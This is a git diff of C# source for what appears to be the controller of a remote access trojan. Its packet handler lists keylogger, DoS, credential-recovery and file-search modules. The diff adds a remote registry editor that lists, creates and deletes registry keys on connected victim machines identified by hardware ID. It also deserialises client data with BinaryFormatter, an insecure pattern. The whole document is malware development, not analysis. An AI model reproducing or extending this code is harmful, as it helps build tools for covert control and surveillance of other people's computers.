this.multiStringValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.multiStringValueToolStripMenuItem.Text = "Multi-String Value";
this.multiStringValueToolStripMenuItem.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click);
//
// expandableStringValueToolStripMenuItem
//
this.expandableStringValueToolStripMenuItem.Name = "expandableStringValueToolStripMenuItem";
this.expandableStringValueToolStripMenuItem.Size = new System.Drawing.Size(218, 22);
this.expandableStringValueToolStripMenuItem.Text = "Expandable String Value";
this.expandableStringValueToolStripMenuItem.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click);
//
// toolStripSeparator1
//
this.toolStripSeparator1.Name = "toolStripSeparator1";
this.toolStripSeparator1.Size = new System.Drawing.Size(120, 6);
//
// deleteToolStripMenuItem
//
this.deleteToolStripMenuItem.Enabled = false;
this.deleteToolStripMenuItem.Name = "deleteToolStripMenuItem";
this.deleteToolStripMenuItem.Size = new System.Drawing.Size(123, 22);
this.deleteToolStripMenuItem.Text = "Delete";
this.deleteToolStripMenuItem.Click += new System.EventHandler(this.deleteRegistryKey_Click);
//
// renameToolStripMenuItem
//
this.renameToolStripMenuItem.Enabled = false;
this.renameToolStripMenuItem.Name = "renameToolStripMenuItem";
this.renameToolStripMenuItem.Size = new System.Drawing.Size(123, 22);
this.renameToolStripMenuItem.Text = "Rename";
this.renameToolStripMenuItem.Click += new System.EventHandler(this.renameRegistryKey_Click);
//
// selectedItem_ContextMenuStrip
//
this.selectedItem_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.modifyToolStripMenuItem,
this.modifyBinaryDataToolStripMenuItem,
this.modifyToolStripSeparator1,
this.deleteToolStripMenuItem1,
this.renameToolStripMenuItem1});
this.selectedItem_ContextMenuStrip.Name = "selectedItem_ContextMenuStrip";
this.selectedItem_ContextMenuStrip.Size = new System.Drawing.Size(198, 98);
//
// modifyToolStripMenuItem
//
this.modifyToolStripMenuItem.Enabled = false;
this.modifyToolStripMenuItem.Font = new System.Drawing.Font("Segoe UI", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.modifyToolStripMenuItem.Name = "modifyToolStripMenuItem";
this.modifyToolStripMenuItem.Size = new System.Drawing.Size(197, 22);
this.modifyToolStripMenuItem.Text = "Modify...";
this.modifyToolStripMenuItem.Click += new System.EventHandler(this.modifyRegistryValue_Click);
//
// modifyBinaryDataToolStripMenuItem
//
this.modifyBinaryDataToolStripMenuItem.Enabled = false;
this.modifyBinaryDataToolStripMenuItem.Name = "modifyBinaryDataToolStripMenuItem";
this.modifyBinaryDataToolStripMenuItem.Size = new System.Drawing.Size(197, 22);
this.modifyBinaryDataToolStripMenuItem.Text = "Modify Binary Data...";
this.modifyBinaryDataToolStripMenuItem.Click += new System.EventHandler(this.modifyBinaryDataRegistryValue_Click);
//
// modifyToolStripSeparator1
//
this.modifyToolStripSeparator1.Name = "modifyToolStripSeparator1";
this.modifyToolStripSeparator1.Size = new System.Drawing.Size(194, 6);
//
// deleteToolStripMenuItem1
//
this.deleteToolStripMenuItem1.Name = "deleteToolStripMenuItem1";
this.deleteToolStripMenuItem1.Size = new System.Drawing.Size(197, 22);
this.deleteToolStripMenuItem1.Text = "Delete";
this.deleteToolStripMenuItem1.Click += new System.EventHandler(this.deleteRegistryValue_Click);
//
// renameToolStripMenuItem1
//
this.renameToolStripMenuItem1.Name = "renameToolStripMenuItem1";
this.renameToolStripMenuItem1.Size = new System.Drawing.Size(197, 22);
this.renameToolStripMenuItem1.Text = "Rename";
this.renameToolStripMenuItem1.Click += new System.EventHandler(this.renameRegistryValue_Click);
//
// lst_ContextMenuStrip
//
this.lst_ContextMenuStrip.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.newToolStripMenuItem1});
this.lst_ContextMenuStrip.Name = "lst_ContextMenuStrip";
this.lst_ContextMenuStrip.Size = new System.Drawing.Size(103, 26);
//
// newToolStripMenuItem1
//
this.newToolStripMenuItem1.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.keyToolStripMenuItem1,
this.toolStripSeparator4,
this.stringValueToolStripMenuItem1,
this.binaryValueToolStripMenuItem1,
this.dWORD32bitValueToolStripMenuItem1,
this.qWORD64bitValueToolStripMenuItem1,
this.multiStringValueToolStripMenuItem1,
this.expandableStringValueToolStripMenuItem1});
this.newToolStripMenuItem1.Name = "newToolStripMenuItem1";
this.newToolStripMenuItem1.Size = new System.Drawing.Size(102, 22);
this.newToolStripMenuItem1.Text = "New";
//
// keyToolStripMenuItem1
//
this.keyToolStripMenuItem1.Name = "keyToolStripMenuItem1";
this.keyToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.keyToolStripMenuItem1.Text = "Key";
this.keyToolStripMenuItem1.Click += new System.EventHandler(this.createNewRegistryKey_Click);
//
// toolStripSeparator4
//
this.toolStripSeparator4.Name = "toolStripSeparator4";
this.toolStripSeparator4.Size = new System.Drawing.Size(215, 6);
//
// stringValueToolStripMenuItem1
//
this.stringValueToolStripMenuItem1.Name = "stringValueToolStripMenuItem1";
this.stringValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.stringValueToolStripMenuItem1.Text = "String Value";
this.stringValueToolStripMenuItem1.Click += new System.EventHandler(this.createStringRegistryValue_Click);
//
// binaryValueToolStripMenuItem1
//
this.binaryValueToolStripMenuItem1.Name = "binaryValueToolStripMenuItem1";
this.binaryValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.binaryValueToolStripMenuItem1.Text = "Binary Value";
this.binaryValueToolStripMenuItem1.Click += new System.EventHandler(this.createBinaryRegistryValue_Click);
//
// dWORD32bitValueToolStripMenuItem1
//
this.dWORD32bitValueToolStripMenuItem1.Name = "dWORD32bitValueToolStripMenuItem1";
this.dWORD32bitValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.dWORD32bitValueToolStripMenuItem1.Text = "DWORD (32-bit) Value";
this.dWORD32bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createDwordRegistryValue_Click);
//
// qWORD64bitValueToolStripMenuItem1
//
this.qWORD64bitValueToolStripMenuItem1.Name = "qWORD64bitValueToolStripMenuItem1";
this.qWORD64bitValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.qWORD64bitValueToolStripMenuItem1.Text = "QWORD (64-bit) Value";
this.qWORD64bitValueToolStripMenuItem1.Click += new System.EventHandler(this.createQwordRegistryValue_Click);
//
// multiStringValueToolStripMenuItem1
//
this.multiStringValueToolStripMenuItem1.Name = "multiStringValueToolStripMenuItem1";
this.multiStringValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.multiStringValueToolStripMenuItem1.Text = "Multi-String Value";
this.multiStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createMultiStringRegistryValue_Click);
//
// expandableStringValueToolStripMenuItem1
//
this.expandableStringValueToolStripMenuItem1.Name = "expandableStringValueToolStripMenuItem1";
this.expandableStringValueToolStripMenuItem1.Size = new System.Drawing.Size(218, 22);
this.expandableStringValueToolStripMenuItem1.Text = "Expandable String Value";
this.expandableStringValueToolStripMenuItem1.Click += new System.EventHandler(this.createExpandStringRegistryValue_Click);
//
// timer1
//
this.timer1.Tick += new System.EventHandler(this.timer1_Tick);
//
// FormRegistryEditor
//
this.AutoScaleDimensions = new System.Drawing.SizeF(96F, 96F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Dpi;
@ -610,7 +615,7 @@ namespace Server.Forms
this.ForeColor = System.Drawing.Color.Black;
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.MainMenuStrip = this.menuStrip;
this.Name = "FrmRegistryEditor";
this.Name = "FormRegistryEditor";
this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
this.Text = "Registry Editor []";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormRegistryEditor_FormClosed);
@ -636,7 +641,7 @@ namespace Server.Forms
private System.Windows.Forms.TableLayoutPanel tableLayoutPanel;
private System.Windows.Forms.SplitContainer splitContainer;
private RegistryTreeView tvRegistryDirectory;
public RegistryTreeView tvRegistryDirectory;
private AeroListView lstRegistryValues;
private System.Windows.Forms.StatusStrip statusStrip;
private System.Windows.Forms.ToolStripStatusLabel selectedStripStatusLabel;
@ -693,5 +698,6 @@ namespace Server.Forms
private System.Windows.Forms.ToolStripMenuItem multiStringValueToolStripMenuItem2;
private System.Windows.Forms.ToolStripMenuItem expandableStringValueToolStripMenuItem2;
private System.Windows.Forms.ToolStripSeparator modifyToolStripSeparator1;
public System.Windows.Forms.Timer timer1;
}
}

24
Server/Forms/FormRegistryEditor.cs
View File

@ -7,6 +7,8 @@ using System.Windows.Forms;
using Microsoft.Win32;
using Server.Connection;
using Server.Helper;
using Server.MessagePack;
using static Server.Helper.RegistrySeeker;
namespace Server.Forms
{
@ -95,6 +97,11 @@ namespace Server.Forms
// signal client to retrive the root nodes (indicated by null)
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "regManager";
msgpack.ForcePathObject("Command").AsString = "LoadRegistryKey";
msgpack.ForcePathObject("RootKeyName").AsString = "";
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
//LoadRegistryKey(null);
}
@ -143,7 +150,7 @@ namespace Server.Forms
};
}
private void AddKeys(object sender, string rootKey, RegSeekerMatch[] matches)
public void AddKeys(string rootKey, RegSeekerMatch[] matches)
{
if (string.IsNullOrEmpty(rootKey))
{
@ -611,6 +618,12 @@ namespace Server.Forms
{
string parentPath = tvRegistryDirectory.SelectedNode.Parent.FullPath;
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Pac_ket").AsString = "regManager";
msgpack.ForcePathObject("Command").AsString = "deleteRegistryKey";
msgpack.ForcePathObject("KeyName").AsString = tvRegistryDirectory.SelectedNode.Name;
msgpack.ForcePathObject("ParentPath").AsString = parentPath;
ThreadPool.QueueUserWorkItem(Client.Send, msgpack.Encode2Bytes());
//DeleteRegistryKey(parentPath, tvRegistryDirectory.SelectedNode.Name);
}
}
@ -789,5 +802,14 @@ namespace Server.Forms
}
#endregion
public void timer1_Tick(object sender, EventArgs e)
{
try
{
if (!Client.TcpClient.Connected) this.Close();
}
catch { this.Close(); }
}
}
}

7
Server/Forms/FormRegistryEditor.resx
View File

@ -125,7 +125,7 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAADm
BwAAAk1TRnQBSQFMAwEBAAFIAQUBSAEFARABAAEQAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA
BwAAAk1TRnQBSQFMAwEBAAFgAQUBYAEFARABAAEQAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA
AUADAAEQAwABAQEAAQgGAAEEGAABgAIAAYADAAKAAQABgAMAAYABAAGAAQACgAIAA8ABAAHAAdwBwAEA
AfABygGmAQABMwUAATMBAAEzAQABMwEAAjMCAAMWAQADHAEAAyIBAAMpAQADVQEAA00BAANCAQADOQEA
AYABfAH/AQACUAH/AQABkwEAAdYBAAH/AewBzAEAAcYB1gHvAQAB1gLnAQABkAGpAa0CAAH/ATMDAAFm
@ -169,7 +169,7 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAABk
CQAAAk1TRnQBSQFMAgEBAgEAAWgBBAFoAQQBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
CQAAAk1TRnQBSQFMAgEBAgEAAYABBAGAAQQBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAARADAAEBAQABCAYAAQQYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@ -227,6 +227,9 @@
<metadata name="lst_ContextMenuStrip.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>907, 17</value>
</metadata>
<metadata name="timer1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>1188, 17</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="$this.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>

2
Server/Handle Packet/HandlerFileSearcher.cs → Server/Handle Packet/HandleFileSearcher.cs
View File

@ -11,7 +11,7 @@ using System.Windows.Forms;
namespace Server.Handle_Packet
{
public class HandlerFileSearcher
public class HandleFileSearcher
{
public async void SaveZipFile(Clients client, MsgPack unpack_msgpack)
{

63
Server/Handle Packet/HandleRegManager.cs Normal file
View File

@ -0,0 +1,63 @@
using Server.Connection;
using Server.Forms;
using Server.Helper;
using Server.MessagePack;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace Server.Handle_Packet
{
class HandleRegManager
{
public async void RegManager(Clients client, MsgPack unpack_msgpack)
{
try
{
switch (unpack_msgpack.ForcePathObject("Command").AsString)
{
case "setClient":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
if (FM.Client == null)
{
client.ID = unpack_msgpack.ForcePathObject("Hwid").AsString;
FM.Client = client;
FM.timer1.Enabled = true;
}
}
break;
}
case "LoadKey":
{
FormRegistryEditor FM = (FormRegistryEditor)Application.OpenForms["remoteRegedit:" + unpack_msgpack.ForcePathObject("Hwid").AsString];
if (FM != null)
{
string rootKey = unpack_msgpack.ForcePathObject("RootKey").AsString;
byte[] Matchesbyte = unpack_msgpack.ForcePathObject("Matches").GetAsBytes();
BinaryFormatter formatter = new BinaryFormatter();
MemoryStream mStream = new MemoryStream();
mStream.Write(Matchesbyte, 0, Matchesbyte.Length);
mStream.Flush();
mStream.Seek(0, SeekOrigin.Begin);
RegistrySeeker seeker = (RegistrySeeker)formatter.Deserialize(mStream);
FM.AddKeys(rootKey, seeker.Matches);
}
break;
}
}
}
catch { }
}
}
}

8
Server/Handle Packet/Packet.cs
View File

@ -174,7 +174,7 @@ namespace Server.Handle_Packet
case "fileSearcher":
{
new HandlerFileSearcher().SaveZipFile(client, unpack_msgpack);
new HandleFileSearcher().SaveZipFile(client, unpack_msgpack);
break;
}
case "Information":
@ -197,6 +197,12 @@ namespace Server.Handle_Packet
new HandleRecovery(client, unpack_msgpack);
break;
}
case "regManager":
{
new HandleRegManager().RegManager(client, unpack_msgpack);
break;
}
}
}));
}

12
Server/Helper/Controls/Regedit.cs
View File

@ -4,6 +4,7 @@ using System.Linq;
using System.Text;
using Microsoft.Win32;
using ProtoBuf;
using static Server.Helper.RegistrySeeker;
namespace Server.Helper
{
@ -43,15 +44,4 @@ namespace Server.Helper
}
}
}
public class RegValueData
{
[ProtoMember(1)]
public string Name { get; set; }
[ProtoMember(2)]
public RegistryValueKind Kind { get; set; }
[ProtoMember(3)]
public byte[] Data { get; set; }
}
}

1
Server/Helper/Controls/RegistryValueLstItem.cs
View File

@ -1,4 +1,5 @@
using System.Windows.Forms;
using static Server.Helper.RegistrySeeker;
namespace Server.Helper
{

185
Server/Helper/Methods.cs
View File

@ -1,8 +1,10 @@
using Microsoft.VisualBasic;
using Microsoft.Win32;
using ProtoBuf;
using Server.Algorithm;
using Server.Handle_Packet;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Drawing;
using System.IO;
@ -121,21 +123,180 @@ namespace Server.Helper
}
[ProtoContract]
public class RegSeekerMatch
public class RegistrySeeker
{
[ProtoMember(1)]
public string Key { get; set; }
[ProtoMember(2)]
public RegValueData[] Data { get; set; }
[ProtoMember(3)]
public bool HasSubKeys { get; set; }
public override string ToString()
[Serializable]
public class RegSeekerMatch
{
return $"({Key}:{Data})";
public string Key { get; set; }
public RegValueData[] Data { get; set; }
public bool HasSubKeys { get; set; }
public override string ToString()
{
return $"({Key}:{Data})";
}
}
[Serializable]
public class RegValueData
{
public string Name { get; set; }
public RegistryValueKind Kind { get; set; }
public byte[] Data { get; set; }
}
/// <summary>
/// The list containing the matches found during the search.
/// </summary>
private readonly List<RegSeekerMatch> _matches;
public RegSeekerMatch[] Matches => _matches?.ToArray();
public RegistrySeeker()
{
_matches = new List<RegSeekerMatch>();
}
public void BeginSeeking(string rootKeyName)
{
if (!String.IsNullOrEmpty(rootKeyName))
{
using (RegistryKey root = GetRootKey(rootKeyName))
{
//Check if this is a root key or not
if (root != null && root.Name != rootKeyName)
{
//Must get the subKey name by removing root and '\'
string subKeyName = rootKeyName.Substring(root.Name.Length + 1);
using (RegistryKey subroot = root.OpenReadonlySubKeySafe(subKeyName))
{
if (subroot != null)
Seek(subroot);
}
}
else
{
Seek(root);
}
}
}
else
{
Seek(null);
}
}
private void Seek(RegistryKey rootKey)
{
// Get root registrys
if (rootKey == null)
{
foreach (RegistryKey key in GetRootKeys())
//Just need root key so process it
ProcessKey(key, key.Name);
}
else
{
//searching for subkeys to root key
Search(rootKey);
}
}
private void Search(RegistryKey rootKey)
{
foreach (string subKeyName in rootKey.GetSubKeyNames())
{
RegistryKey subKey = rootKey.OpenReadonlySubKeySafe(subKeyName);
ProcessKey(subKey, subKeyName);
}
}
private void ProcessKey(RegistryKey key, string keyName)
{
if (key != null)
{
List<RegValueData> values = new List<RegValueData>();
foreach (string valueName in key.GetValueNames())
{
RegistryValueKind valueType = key.GetValueKind(valueName);
object valueData = key.GetValue(valueName);
values.Add(RegistryKeyHelper.CreateRegValueData(valueName, valueType, valueData));
}
AddMatch(keyName, RegistryKeyHelper.AddDefaultValue(values), key.SubKeyCount);
}
else
{
AddMatch(keyName, RegistryKeyHelper.GetDefaultValues(), 0);
}
}
private void AddMatch(string key, RegValueData[] values, int subkeycount)
{
RegSeekerMatch match = new RegSeekerMatch { Key = key, Data = values, HasSubKeys = subkeycount > 0 };
_matches.Add(match);
}
public static RegistryKey GetRootKey(string subkeyFullPath)
{
string[] path = subkeyFullPath.Split('\\');
try
{
switch (path[0]) // <== root;
{
case "HKEY_CLASSES_ROOT":
return RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64);
case "HKEY_CURRENT_USER":
return RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64);
case "HKEY_LOCAL_MACHINE":
return RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64);
case "HKEY_USERS":
return RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64);
case "HKEY_CURRENT_CONFIG":
return RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64);
default:
/* If none of the above then the key must be invalid */
throw new Exception("Invalid rootkey, could not be found.");
}
}
catch (SystemException)
{
throw new Exception("Unable to open root registry key, you do not have the needed permissions.");
}
catch (Exception e)
{
throw e;
}
}
public static List<RegistryKey> GetRootKeys()
{
List<RegistryKey> rootKeys = new List<RegistryKey>();
try
{
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.ClassesRoot, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentUser, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.Users, RegistryView.Registry64));
rootKeys.Add(RegistryKey.OpenBaseKey(RegistryHive.CurrentConfig, RegistryView.Registry64));
}
catch (SystemException)
{
throw new Exception("Could not open root registry keys, you may not have the needed permission");
}
catch (Exception e)
{
throw e;
}
return rootKeys;
}
}
}

33
Server/Helper/Controls/RegistryKeyExtensions.cs → Server/Helper/RegistryKeyExtensions.cs
View File

@ -1,8 +1,13 @@
using System;
using Microsoft.Win32;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Linq;
namespace Server.Helper
{
/// <summary>
/// Provides extensions for registry key and value operations.
/// </summary>
public static class RegistryKeyExtensions
{
public static string RegistryTypeToString(this RegistryValueKind valueKind, object valueData)
@ -29,6 +34,30 @@ namespace Server.Helper
}
}
public static RegistryKey OpenReadonlySubKeySafe(this RegistryKey key, string name)
{
try
{
return key.OpenSubKey(name, false);
}
catch
{
return null;
}
}
public static RegistryKey OpenWritableSubKeySafe(this RegistryKey key, string name)
{
try
{
return key.OpenSubKey(name, true);
}
catch
{
return null;
}
}
public static string RegistryTypeToString(this RegistryValueKind valueKind)
{
switch (valueKind)

156
Server/Helper/RegistryKeyHelper.cs Normal file
View File

@ -0,0 +1,156 @@
using System;
using System.Collections.Generic;
using System.Linq;
using Microsoft.Win32;
using static Server.Helper.RegistrySeeker;
namespace Server.Helper
{
public static class RegistryKeyHelper
{
private static string DEFAULT_VALUE = String.Empty;
/// <summary>
/// Adds a value to the registry key.
/// </summary>
/// <param name="hive">Represents the possible values for a top-level node on a foreign machine.</param>
/// <param name="path">The path to the registry key.</param>
/// <param name="name">The name of the value.</param>
/// <param name="value">The value.</param>
/// <param name="addQuotes">If set to True, adds quotes to the value.</param>
/// <returns>True on success, else False.</returns>
public static bool AddRegistryKeyValue(RegistryHive hive, string path, string name, string value, bool addQuotes = false)
{
try
{
using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path))
{
if (key == null) return false;
if (addQuotes && !value.StartsWith("\"") && !value.EndsWith("\""))
value = "\"" + value + "\"";
key.SetValue(name, value);
return true;
}
}
catch (Exception)
{
return false;
}
}
/// <summary>
/// Opens a read-only registry key.
/// </summary>
/// <param name="hive">Represents the possible values for a top-level node on a foreign machine.</param>
/// <param name="path">The path to the registry key.</param>
/// <returns></returns>
public static RegistryKey OpenReadonlySubKey(RegistryHive hive, string path)
{
try
{
return RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenSubKey(path, false);
}
catch
{
return null;
}
}
/// <summary>
/// Deletes the specified value from the registry key.
/// </summary>
/// <param name="hive">Represents the possible values for a top-level node on a foreign machine.</param>
/// <param name="path">The path to the registry key.</param>
/// <param name="name">The name of the value to delete.</param>
/// <returns>True on success, else False.</returns>
public static bool DeleteRegistryKeyValue(RegistryHive hive, string path, string name)
{
try
{
using (RegistryKey key = RegistryKey.OpenBaseKey(hive, RegistryView.Registry64).OpenWritableSubKeySafe(path))
{
if (key == null) return false;
key.DeleteValue(name, true);
return true;
}
}
catch (Exception)
{
return false;
}
}
/// <summary>
/// Checks if the provided value is the default value
/// </summary>
/// <param name="valueName">The name of the value</param>
/// <returns>True if default value, else False</returns>
public static bool IsDefaultValue(string valueName)
{
return String.IsNullOrEmpty(valueName);
}
/// <summary>
/// Adds the default value to the list of values and returns them as an array.
/// If default value already exists this function will only return the list as an array.
/// </summary>
/// <param name="values">The list with the values for which the default value should be added to</param>
/// <returns>Array with all of the values including the default value</returns>
public static RegValueData[] AddDefaultValue(List<RegValueData> values)
{
if(!values.Any(value => IsDefaultValue(value.Name)))
{
values.Add(GetDefaultValue());
}
return values.ToArray();
}
/// <summary>
/// Gets the default registry values
/// </summary>
/// <returns>A array with the default registry values</returns>
public static RegValueData[] GetDefaultValues()
{
return new[] {GetDefaultValue()};
}
public static RegValueData CreateRegValueData(string name, RegistryValueKind kind, object value = null)
{
var newRegValue = new RegValueData {Name = name, Kind = kind};
if (value == null)
newRegValue.Data = new byte[] { };
else
{
switch (newRegValue.Kind)
{
case RegistryValueKind.Binary:
newRegValue.Data = (byte[]) value;
break;
case RegistryValueKind.MultiString:
newRegValue.Data = ByteConverter.GetBytes((string[]) value);
break;
case RegistryValueKind.DWord:
newRegValue.Data = ByteConverter.GetBytes((uint) (int) value);
break;
case RegistryValueKind.QWord:
newRegValue.Data = ByteConverter.GetBytes((ulong) (long) value);
break;
case RegistryValueKind.String:
case RegistryValueKind.ExpandString:
newRegValue.Data = ByteConverter.GetBytes((string) value);
break;
}
}
return newRegValue;
}
private static RegValueData GetDefaultValue()
{
return CreateRegValueData(DEFAULT_VALUE, RegistryValueKind.String);
}
}
}

6
Server/Server.csproj
View File

@ -284,7 +284,8 @@
<Compile Include="Handle Packet\HandleInformation.cs" />
<Compile Include="Handle Packet\HandleNetstat.cs" />
<Compile Include="Handle Packet\HandleRecovery.cs" />
<Compile Include="Handle Packet\HandlerFileSearcher.cs" />
<Compile Include="Handle Packet\HandleRegManager.cs" />
<Compile Include="Handle Packet\HandleFileSearcher.cs" />
<Compile Include="Handle Packet\HandleChat.cs" />
<Compile Include="Handle Packet\HandleDos.cs" />
<Compile Include="Handle Packet\HandleKeylogger.cs" />
@ -321,7 +322,6 @@
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\ReferenceLoader.cs" />
<Compile Include="Helper\Controls\Regedit.cs" />
<Compile Include="Helper\Controls\RegistryKeyExtensions.cs" />
<Compile Include="Helper\Controls\RegistryTreeView.cs">
<SubType>Component</SubType>
</Compile>
@ -332,6 +332,8 @@
<Compile Include="Helper\Controls\WordTextBox.Designer.cs">
<DependentUpon>WordTextBox.cs</DependentUpon>
</Compile>
<Compile Include="Helper\RegistryKeyExtensions.cs" />
<Compile Include="Helper\RegistryKeyHelper.cs" />
<Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" />
<Compile Include="MessagePack\MsgPackType.cs" />